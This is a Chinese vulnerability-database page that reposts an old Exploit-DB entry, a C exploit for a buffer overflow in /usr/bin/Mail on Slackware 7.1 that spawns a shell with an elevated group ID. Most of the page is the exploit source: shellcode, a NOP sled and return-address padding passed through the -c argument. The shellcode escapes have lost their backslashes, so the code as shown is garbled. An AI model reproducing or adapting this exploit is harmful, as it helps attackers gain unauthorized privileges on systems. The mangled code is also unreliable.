Slackware 7.1 – ‘/usr/bin/mail’ Local Privilege Escalation-安全小百科

Slackware 7.1 – ‘/usr/bin/mail’ Local Privilege Escalation

漏洞ID	1053520	漏洞类型
发布时间	2001-03-03	更新时间	2001-03-03
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/285

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
   Slackware 7.1 /usr/bin/Mail Exploit give gid=1 ( bin )
   if /usr/bin/Mail is setgid but it is not setgid,
   setuid for default.

  tested on my box ( sl 7.1 )
  crazy exploited by kengz.
  GID.... x01 = 1 (bin)
          x02 = 2 ,
          x03 = 3 ,
     ...  x0a = 10
          x0b = 11
    ....
*/

#include <stdio.h>
#include <string.h>
#define GID    "x03"

int main(int argc, char **argv) {
  char shellcode[] =
    "x31xdbx31xc9xbbxffxffxffxffxb1"GID"x31"
    "xc0xb0x47xcdx80x31xdbx31xc9xb3"GID"xb1"
     GID"x31xc0xb0x47xcdx80xebx1fx5ex89x76"
    "x08x31xc0x88x46x07x89x46x0cxb0x0bx89"
    "xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89"
    "xd8x40xcdx80xe8xdcxffxffxff/bin/sh";

  char buf2[10000];
  char buffer[15000];
  char nop[8000];
  char *p, *q;
  long ret=0xbfffffff;
  int len, offset = 0, i,j,k,ii;
  ret = ret - 5000;

  for(k=0; k<2000; k+=4)
    *(long *)&buf2[k] = ret;

  for(k=0;k<7000;k++){
    strcat(nop,"x90");
  }
  snprintf(buffer,12000,"%s%s%s",nop,shellcode,buf2);
  printf("Crazy Mail sploit by kengz n");
  printf("Hit    '  .  ' to go n");
  execl("/usr/bin/Mail","Mail","x","-s","x","-c",buffer,0);
}


// milw0rm.com [2001-03-03]

相关推荐: Multiple Vendor Call Gate Creation Input Validation Vulnerability

Multiple Vendor Call Gate Creation Input Validation Vulnerability 漏洞ID 1103423 漏洞类型 Input Validation Error 发布时间 2001-02-16 更新时间 20…

文章版权归作者所有，未经允许请勿转载。

THE END